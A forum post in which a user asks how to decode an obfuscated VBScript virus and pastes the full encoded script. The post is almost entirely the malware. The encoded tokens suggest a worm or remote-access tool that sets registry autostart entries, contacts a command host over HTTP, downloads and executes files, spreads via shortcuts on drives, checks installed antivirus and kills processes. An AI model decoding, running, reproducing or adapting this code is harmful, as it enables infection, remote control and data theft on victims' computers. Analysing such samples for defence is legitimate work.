Hi ;D
I don't know how to decode this VBS; I can't even see how it was encrypted.
Can someone explain how it was encrypted and how to decrypt it?
Here is the VBS virus:
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b\85"™žŸŒ——"KhKMPŒ››ŒŸŒPM85—™–'"—KhKŸ 85—™–'š—KhK'Œ—ž858585"˜Kž"——š•K85žŸKž"——š•KhK¢žŽ"›ŸYŽŒŸš•ŽŸSM¢žŽ"›ŸYž"——MT85"˜K'"—ž¤žŸ˜š•85žŸK'"—ž¤žŸ˜š•KhKŽŒŸš•ŽŸSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"˜K"ŸŸ›š•85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85858585"™žŸŒ——™Œ˜KhK¢žŽ"›ŸYžŽ"›Ÿ™Œ˜85žŸŒŸ ›KhKž"——š•Yž›Ž"Œ—'š—žKSMžŸŒŸ ›MTKQKM‡M85"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žS"™žŸŒ——"TKQKM‡M85"'K™šŸK'"—ž¤žŸ˜š•Y'š—£"žŸžS"™žŸŒ——"TKŸ"™KK"™žŸŒ——"KhKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŸ˜›PMTKQKM‡M85ž›—"ŸKhKMgMKQKM§MKQKMiM85ž—›KhK`[[[K85"˜Kž›š™ž85"˜KŽ˜85"˜K›ŒŒ˜85"™'šKhKMM85 žž›Œ"™'KhKMM85žŸŒŸŒŸKhKMM85"˜Kš™š™Ž858585š™KšKž ˜K™£Ÿ858585"™žŸŒ™Ž85¢""—KŸ 8585"™žŸŒ——8585ž›š™žKhKMM85ž›š™žKhK›šžŸKSM"žXŒ¤MWMMT85Ž˜KhKž›—"ŸKSž›š™žWž›—"ŸT85ž—ŽŸKŽŒžKŽ˜KS[T85ŽŒžKM£ŽŽ ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£Ž ŸK›ŒŒ˜85ŽŒžKM ›ŒŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKš™š™ŽYŽ—šž85KKKKKKžŸKš™š™ŽKhKK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KW]WK'Œ—žT85KKKKKKš™š™ŽY¢"ŸK›ŒŒ˜85KKKKKKš™š™ŽYŽ—šž85KKKKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"S^_T85KKKKKK¢žŽ"›ŸYœ "ŸK85ŽŒžKM ™"™žŸŒ——M85KKKKKK ™"™žŸŒ——85ŽŒžKMž™M85KKKKKK𢙗šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMž"ŸXž™M85KKKKKKž"Ÿš¢™—šŒKŽ˜KS\TWŽ˜KS]T85ŽŒžKMŽ¡M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK ›—šŒKS›ŒŒ˜T85ŽŒžKKM™ ˜X"¡M85KKKKKK›šžŸKM"žX™ ˜X"¡MW™ ˜"¡KK85ŽŒžKKM™ ˜X'Œ'M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žX™ ˜X'Œ'MW™ ˜'Œ'KS›ŒŒ˜T85ŽŒžKKM™ ˜X›šŽžžM85KKKKKK›šžŸKM"žX™ ˜X›šŽžžMW™ ˜›šŽžžKKK85ŽŒžKKMŽ˜Xž"——M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK›šžŸKM"žXŽ˜Xž"——MWŽ˜ž"——KS›ŒŒ˜TKK85ŽŒžKKM—ŸM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK—Ÿ'Œ'KS›ŒŒ˜TK85ŽŒžKKM£"ŸX›šŽžžM85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKK£"Ÿ›šŽžžKS›ŒŒ˜TK85ŽŒžKKMž—›M85KKKKKK›ŒŒ˜KhKŽ˜KS\T85KKKKKKž—›KhK¡Œ—KS›ŒŒ˜TKKKKKKKK85™Kž—ŽŸ8585¢žŽ"›ŸYž—›Kž—›8585¢™858585ž K"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K—™–š•85"˜K'"—™Œ˜85"˜K'š—™Œ˜85"˜K'"—"Žš™85"˜K'š—"Žš™8585 ›žŸŒŸ85'šKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž8585"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWK"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜WŸ 
85KKKK"'KK'"—ž¤žŸ˜š•Y'"—£"žŸžKS"¡Y›ŒŸ"KQKM‡MKQK"™žŸŒ——™Œ˜TKKŸ"™85KKKKKKKK'"—ž¤žŸ˜š•Y'Ÿ'"—S"¡Y›ŒŸ"KQKM‡MKKQK"™žŸŒ——™Œ˜TYŒŸŸ" ŸžKhK]V_85KKKK™K"'85KKKK'šKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYq"—ž85KKKKKKKK"'K™šŸK—™–'"—KŸ"™K£"ŸK'š85KKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTKS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK]V_85KKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'"—™Œ˜KS[TKQKMY—™–MTK85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKKKKKKKKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKKKKKKKKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKKKKKKKKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'"—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKKKKKKKKKKKKKK'"—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡MKQKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡YMKQKž›—"ŸS'"—Y™Œ˜WKMYMTS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTQKM‡MTKQKM‡'Œ —Ÿ"Žš™‡MTK85KKKKKKKKKKKKKKKKKKKK"'KK"™žŸKS'"—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—Y›ŒŸ"85KKKKKKKKKKKKKKKKKKKK—žK85KKKKKKKKKKKKKKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'"—"Žš™85KKKKKKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKKKKKKKKKK—™–š•YžŒ¡ST85KKKKKKKKKKKKKKKK™K"'85KKKKKKKKKKKK™K"'85KKKKKKKK™K"'85KKKK™£Ÿ85KKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKK"'K™šŸK—™–'š—KŸ"™K£"ŸK'š85KKKKKKKK'š—YŒŸŸ" ŸžKhK]V_85KKKKKKKK'š—™Œ˜KhK'š—Y™Œ˜85KKKKKKKKžŸK—™–š•KhKž"——š•YŽŒŸž"šŸŽ ŸKS"¡Y›ŒŸ"KQKM‡MKKQK'š—™Œ˜KQKMY—™–MTK85KKKKKKKK—™–š•Y¢"™š¢žŸ¤—KhKb85KKKKKKKK—™–š•YŸŒ'Ÿ›ŒŸ"KhKMŽ˜Y£M85KKKKKKKK—™–š•Y¢š–"™'"ŽŸš¤KhKMM85KKKKKKKK—™–š•YŒ' ˜™ŸžKhKMZŽKžŸŒŸKMKQK›—ŒŽS'š—Y™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQKMQžŸŒŸK£›—šKMKQK›—ŒŽS"™žŸŒ——™Œ˜WMKMWKŽ"¢S^_TKQKMKMKQKŽ"¢S^_TTKQMQ£"ŸM85KKKKKKKK'š—"Žš™KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡Ž—Œžžž‡'š—‡'Œ 
—Ÿ"Žš™‡MTK85KKKKKKKK"'KK"™žŸKS'š—"Žš™WMWMTKhK[KŸ"™85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—Y›ŒŸ"85KKKKKKKK—žK85KKKKKKKKKKKK—™–š•Y"Žš™—šŽŒŸ"š™KhK'š—"Žš™85KKKKKKKK™K"'85KKKKKKKK—™–š•YžŒ¡ST85KKKK™£Ÿ85™Kt'85™Kt'85™K"'85™£Ÿ85YŽ—Œ85™Kž 8585ž K ™"™žŸŒ——85š™KšKž ˜K™£Ÿ85"˜K'"—™Œ˜85"˜K'š—™Œ˜8585ž"——š•Y'—ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"𙇠™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85ž"——š•Y'—ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"𙇠™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[T85'"—ž¤žŸ˜š•Y—Ÿ'"—KžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 85'"—ž¤žŸ˜š•Y—Ÿ'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜KWŸ 8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KK"¡Y"žŒ¤KhKŸ KŸ"™85"'KK"¡Y'ž›ŒŽKKiK[KŸ"™85"'KK"¡Y"¡Ÿ¤›KKhK\KŸ"™85KKKK'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KSK"¡Y›ŒŸ"KQKM‡MTY'"—ž85KKKKKKKKKš™KšKž ˜K™£Ÿ85KKKKKKKKK"'KK"™žŸKS'"—Y™Œ˜WMYMTKŸ"™85KKKKKKKKKKKKK"'KK—ŽŒžKSž›—"ŸS'"—Y™Œ˜WKMYMTS š ™Sž›—"ŸS'"—Y™Œ˜WKMYMTTTTKgiKM—™–MKŸ"™85KKKKKKKKKKKKKKKKK'"—YŒŸŸ" ŸžKhK[85KKKKKKKKKKKKKKKKK"'KK ŽŒžKS'"—Y™Œ˜TKgiK ŽŒžKS"™žŸŒ——™Œ˜TKŸ"™85KKKKKKKKKKKKKKKKKKKKK'"—™Œ˜KhKž›—"ŸS'"—Y™Œ˜WMYMT85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—™Œ˜S[TKQKMY—™–MKT85KKKKKKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS"¡Y›ŒŸ"KQKM‡MKQK'"—Y™Œ˜T85KKKKKKKKKKKKKKKKK™Kt'85KKKKKKKKKKKKK—ž85KKKKKKKKKKKKKKKKK'"—ž¤žŸ˜š•Y—Ÿ'"—KS'"—Y›ŒŸ"TK85KKKKKKKKKKKKK™K"'85KKKKKKKKK™K"'85KKKKK™£Ÿ85KKKKK'šKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—SK"¡Y›ŒŸ"KQKM‡MKTYž 'š—ž85KKKKKKKKK'š—YŒŸŸ" ŸžKhK[85KKKKK™£Ÿ85™K"'85™K"'85™K"'85™£Ÿ85¢žŽ"›ŸYœ "Ÿ85™Kž 8585' ™ŽŸ"š™K›šžŸKSŽ˜KW›ŒŒ˜T8585›šžŸKhK›ŒŒ˜85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKŽ˜WK'Œ—ž85"ŸŸ›š•YžŸœ žŸ"ŒKM žXŒ'™ŸeMW"™'š˜ŒŸ"š™85"ŸŸ›š•Yž™K›ŒŒ˜85›šžŸKhK"ŸŸ›š•Yž›š™žŸ£Ÿ85™K' ™ŽŸ"š™8585' ™ŽŸ"š™K"™'š˜ŒŸ"š™85š™KšKž ˜K™£Ÿ85"'KK"™'KhKMMKŸ"™85KKKK"™'KhK"¢"KQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMPŽš˜› Ÿ™Œ˜PMTKQKž›—"ŸK85KKKK"™'KhK"™'KKQKž"——š•Y£›Œ™™¡"š™˜™ŸžŸ"™'žSMP ž™Œ˜PMTKQKž›—"Ÿ8585KKKKžŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85KKKKžŸKšžKhKššŸY£Žœ 
¤KSMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MT85KKKK'šKŒŽ"Kšž"™'šK"™Kšž85KKKKKKK"™'KhK"™'KQKšž"™'šYŽŒ›Ÿ"š™KQKž›—"ŸKK85KKKKKKK£"ŸK'š85KKKK™£Ÿ85KKKK"™'KhK"™'KQKM›— žMKQKž›—"Ÿ85KKKK"™'KhK"™'KQKžŽ "Ÿ¤KQKž›—"Ÿ85KKKK"™'KhK"™'KQK žž›Œ"™'85KKKK"™'š˜ŒŸ"š™KhK"™'KK85—ž85KKKK"™'š˜ŒŸ"š™KhK"™'85™K"'85™K' ™ŽŸ"š™858585ž K ›žŸŒŸKST85š™KšKž ˜Ky£Ÿ8585ž"——š•Y'¢"ŸKMsvp,,Šn€}}pyŠ€~p}‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"𙇠™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85ž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡˜"Žšžš'Ÿ‡¢"™š¢ž‡Ž ™Ÿ¡ž"𙇠™‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TWKKM¢žŽ"›ŸY£KZZmKMKKQKŽ"¢S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKŽ"¢S^_TKWKM}prŠ~...M85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W"™žŸŒ——"KQK"™žŸŒ——™Œ˜WŸ 85'"—ž¤žŸ˜š•YŽš›¤'"—K¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜WžŸŒŸ ›KQK"™žŸŒ——™Œ˜KWŸ 8585™Kž 858585' ™ŽŸ"š™K"¢"85š™KšKž ˜K™£Ÿ8585žŸKššŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸK"ž–žKhKššŸY£Žœ ¤KSMž—ŽŸKUK'š˜K¢"™^]Š—š'"ŽŒ—"ž–MT85'šKŒŽ"K"ž–K"™K"ž–ž85KKKK"'KK"ž–Y¡š— ˜ž"Œ—™ ˜KgiKMMKŸ"™85KKKKKKKK"¢"KhK"ž–Y¡š— ˜ž"Œ—™ ˜85KKKKKKKK£"ŸK'š85KKKK™K"'85™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™KžŽ "Ÿ¤K85š™KšKž ˜K™£Ÿ8585žŽ "Ÿ¤KhKMM8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže¦"˜›žš™ŒŸ"š™—¡—h"˜›žš™ŒŸ¨L‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Šš›ŒŸ"™'ž¤žŸ˜MWW_cT85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž85KKKK¡ž"š™žŸKhKž›—"ŸKSš•"Ÿ˜Y¡ž"š™WMYMT85™£Ÿ85¡ž"š™žŸKhKž›—"ŸKSŽš—"Ÿ˜žY¡ž"š™WMYMT85šž¡ž"š™KhK¡ž"š™žŸKS[TKQKMYM85'šKK£KhK\KŸšK š ™KS¡ž"š™žŸT854Kšž¡ž"š™KhKšž¡ž"š™KQKK¡ž"š™žŸKS"T85™£Ÿ85šž¡ž"š™KhK¡Œ—KSšž¡ž"š™T85"'KKšž¡ž"š™KiKaKŸ"™KžŽKhKMžŽ "Ÿ¤Ž™Ÿ]MK—žKžŽKhKMžŽ "Ÿ¤Ž™ŸM8585žŸKš•žŽ "Ÿ¤Ž™ŸKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡—šŽŒ—"šžŸ‡ššŸ‡MKQKžŽT85~ŸKŽš—Œ™Ÿ"¡" žKhKš•žŽ "Ÿ¤Ž™ŸY£Žœ ¤SMž—ŽŸKUK'š˜KŒ™Ÿ"¡" ž›š ŽŸMWM¢œ—MW[T8585'šKŒŽ"Kš•Œ™Ÿ"¡" žK"™KŽš—Œ™Ÿ"¡" ž85KKKKžŽ "Ÿ¤KKhKžŽ "Ÿ¤KKQKš•Œ™Ÿ"¡" žY"ž›—Œ¤™Œ˜KQKMKYM85™£Ÿ85"'KžŽ "Ÿ¤KKhKMMKŸ"™KžŽ "Ÿ¤KKhKM™Œ™XŒ¡M85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K"™žŸŒ™Ž85š™KšKž ˜K™£Ÿ8585 žž›Œ"™'KhKž"——š•Y'ŒKSMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKQKM‡MT85"'K 
žž›Œ"™'KhKMMKŸ"™85KKK"'K—ŽŒžKSK˜"S¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜W]TTKhKMe‡MKQKK—ŽŒžS"™žŸŒ——™Œ˜TKŸ"™85KKKKKK žž›Œ"™'KhKMŸ KXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M85KKK—ž85KKKKKK žž›Œ"™'KhKM'Œ—žKXKMKQKŒŸ85KKKKKKž"——š•Y'¢"ŸKMsvp,,ŠwznlwŠxlnstyp‡žš'Ÿ¢Œ‡MKQKž›—"ŸKS"™žŸŒ——™Œ˜WMYMTS[TKKQKM‡MWKK žž›Œ"™'WKM}prŠ~...M8585KKK™K"'85™Kt'85858585 ›žŸŒŸ85žŸKžŽ"›Ÿ' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS¢žŽ"›ŸYžŽ"›Ÿ' ——™Œ˜T85žŸK"™žŸŒ——' ——™Œ˜ž"šŸKhKK'"—ž¤žŸ˜š•Y'Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜T85"'KK—ŽŒžKSžŽ"›Ÿ' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKgiK—ŽŒžKS"™žŸŒ——' ——™Œ˜ž"šŸYž"šŸ›ŒŸ"TKŸ"™K85KKKKž"——š•Y ™KM¢žŽ"›ŸY£KZZmKMKQKŽ"S^_TKQK"™žŸŒ——"KQK"™žŸŒ——™Œ˜KQKn"S^_T85KKKK¢žŽ"›ŸYœ "ŸK85™Kt'85YŽ—Œ85žŸKš™š™ŽKhK'"—ž¤žŸ˜š•Yš›™Ÿ£Ÿ'"—KS"™žŸŒ——"KQK"™žŸŒ——™Œ˜KWcWK'Œ—žT85"'KKY™ ˜KiK[KŸ"™K¢žŽ"›ŸYœ "Ÿ85™K' ™ŽŸ"š™858585ž Kž"Ÿš¢™—šŒKS'"— —W'"—™Œ˜T8585žŸ—"™–KhK'"— —85žŸžŒ¡ŸšKhK"™žŸŒ——"KQK'"—™Œ˜85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MKT85š•"ŸŸ›š¢™—šŒYš›™KM'ŸMWKžŸ—"™–WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™8585žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85K85"'Kš•"ŸŸ›š¢™—šŒYžŸŒŸ žKhK][[KŸ"™85KKK"˜KKš•žŸŒ˜š¢™—šŒ85KKKžŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒ8544YŸ¤›KhK\K8544Yš›™8544Y¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544YžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544YŽ—šž85KKK™K¢"Ÿ"85KKKžŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 8585ž K𢙗šŒKS'"— —W'"—"T8585"'K'"—"KhKMMKŸ"™K85KKK'"—"KhK"™žŸŒ——"85™K"'8585žŸžŒ¡ŸšKhK'"—"KQK˜"KS'"— —WK"™žŸ¡KS'"— —WM‡MTKVK\T85žŸKš•"ŸŸ›š¢™—šŒKhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85š•"ŸŸ›š¢™—šŒYš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXž™"™'MKQKž›—"ŸKQK'"— —WK'Œ—ž85š•"ŸŸ›š¢™—šŒYž™KMM85KKKKK85žŸKš•'žšš¢™—šŒKhKŽŒŸš•ŽŸKSMžŽ"›Ÿ"™'Y'"—ž¤žŸ˜š•ŽŸMT85"'KKš•'žšš¢™—šŒY'"—£"žŸžKSžŸžŒ¡ŸšTKŸ"™85KKKKš•'žšš¢™—šŒY—Ÿ'"—KSžŸžŒ¡ŸšT85™K"'85"'KKš•"ŸŸ›š¢™—šŒYžŸŒŸ 
žKhK][[KŸ"™85KKKK"˜KKš•žŸŒ˜š¢™—šŒ854žŸKKš•žŸŒ˜š¢™—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85KKKK¢"Ÿ"Kš•žŸŒ˜š¢™—šŒK8544KYŸ¤›KhK\K8544KYš›™8544KY¢"ŸKš•"ŸŸ›š¢™—šŒYž›š™žš¤8544KYžŒ¡Ÿš'"—KžŸžŒ¡Ÿš8544KYŽ—šž854™K¢"Ÿ"85KKKKžŸKš•žŸŒ˜š¢™—šŒKKhK™šŸ""™'85™K"'85"'Kš•'žšš¢™—šŒY'"—£"žŸžSžŸžŒ¡ŸšTKŸ"™85KKKž"——š•Y ™Kš•'žšš¢™—šŒY'Ÿ'"—KSžŸžŒ¡ŸšTYž"šŸ›ŒŸ"85™K"'K85™Kž 858585' ™ŽŸ"š™K ›—šŒKS'"— —T8585"˜KK"ŸŸ›š•Wš•žŸŒ˜ ›—šŒW ''85žŸKKš•žŸŒ˜ ›—šŒKhKŽŒŸš•ŽŸSMŒšYžŸŒ˜MT85¢"Ÿ"Kš•žŸŒ˜ ›—šŒK85KKKKKYŸ¤›KhK\K85KKKKKYš›™854KY—šŒ'š˜'"—K'"— —854K ''KhKYŒ854KYŽ—šž85™K¢"Ÿ"85žŸKš•žŸŒ˜š¢™—šŒKhK™šŸ""™'85žŸK"ŸŸ›š•KhKŽŒŸš•ŽŸSM˜ž£˜—]Y£˜—"ŸŸ›MT85"ŸŸ›š•Yš›™KM›šžŸMWM"ŸŸ›eZZMKQK"šžŸKQKMeMKQK›šŸKQMZMKQKM"žXŽ¡"™'MKQKž›—"ŸKQK'"— —WK'Œ—ž85"ŸŸ›š•Yž™K ''85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜"¡KST8585'šKKŒŽ"K"¡K"™K'"—ž¤žŸ˜š•Y"¡ž85"'KKK"¡Y"žŒ¤KhKŸ KŸ"™85KKKKK™ ˜"¡KhK™ ˜"¡KQK"¡Y›ŒŸ"KQKM§MKQK"¡Y"¡Ÿ¤›KQKž›—"Ÿ85™K"'85™£Ÿ85™Kq ™ŽŸ"š™8585' ™ŽŸ"š™K™ ˜'Œ'KS™ ˜"T8585™ ˜'Œ'KhK™ ˜"KQKž›—"Ÿ85'šKKŒŽ"K'š—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TYž 'š—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'š—Y™Œ˜KQKM§MKQKMMKQKM§MKQKMMKQKM§MKQK'š—YŒŸŸ" ŸžKQKž›—"Ÿ85™£Ÿ8585'šKKŒŽ"K'"—K"™K'"—ž¤žŸ˜š•Y'Ÿ'š—KS™ ˜"TY'"—ž85KKKKK™ ˜'Œ'KhK™ ˜'Œ'KQK'"—Y™Œ˜KQKM§MKQK'"—Yž"¥KKQKM§MKQKM'MKQKM§MKQK'"—YŒŸŸ" ŸžKQKž›—"Ÿ8585™£Ÿ85™K' ™ŽŸ"š™858585' ™ŽŸ"š™K™ ˜›šŽžžKST8585š™KšKž ˜K™£Ÿ8585žŸKš•¢˜"ž¡"ŽKhK'Ÿš•ŽŸSM¢"™˜'˜Ÿže‡‡Y‡ššŸ‡Ž"˜¡]MT85žŸKŽš—"Ÿ˜žKhKš•¢˜"ž¡"ŽY£Žœ ¤SMž—ŽŸKUK'š˜K¢"™^]Š›šŽžžMWW_cT8585"˜Kš•"Ÿ˜85'šKŒŽ"Kš•"Ÿ˜K"™KŽš—"Ÿ˜ž854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y™Œ˜KQKM§M854™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y›šŽžž"KQKM§M85KKKK™ ˜›šŽžžKhK™ ˜›šŽžžKQKš•"Ÿ˜Y£Ž ŸŒ—›ŒŸ"KQKž›—"Ÿ85™£Ÿ85™K' ™ŽŸ"š™8585ž K£"Ÿ›šŽžžKS›"T85š™KšKž ˜K™£Ÿ8585ž"——š•Y ™KMŸŒž––"——KZqKZKZ{toKMKQK›"WbWŸ 85™Kž 8585ž K—Ÿ'Œ'KS —T85š™KšKž ˜K™£Ÿ8585'"—ž¤žŸ˜š•Y—Ÿ'"—K —85'"—ž¤žŸ˜š•Y—Ÿ'š—K —8585™Kž 8585' ™ŽŸ"š™KŽ˜ž"——KSŽ˜T8585"˜K"ŸŸ›š•Wš£ŽWŒŒ——'š˜Œ™¤8585žŸKš£ŽKhKž"——š•Y£ŽKSMPŽš˜ž›ŽPKZŽKMKQKŽ˜T85"'K™šŸKš£ŽYžŸš ŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸš 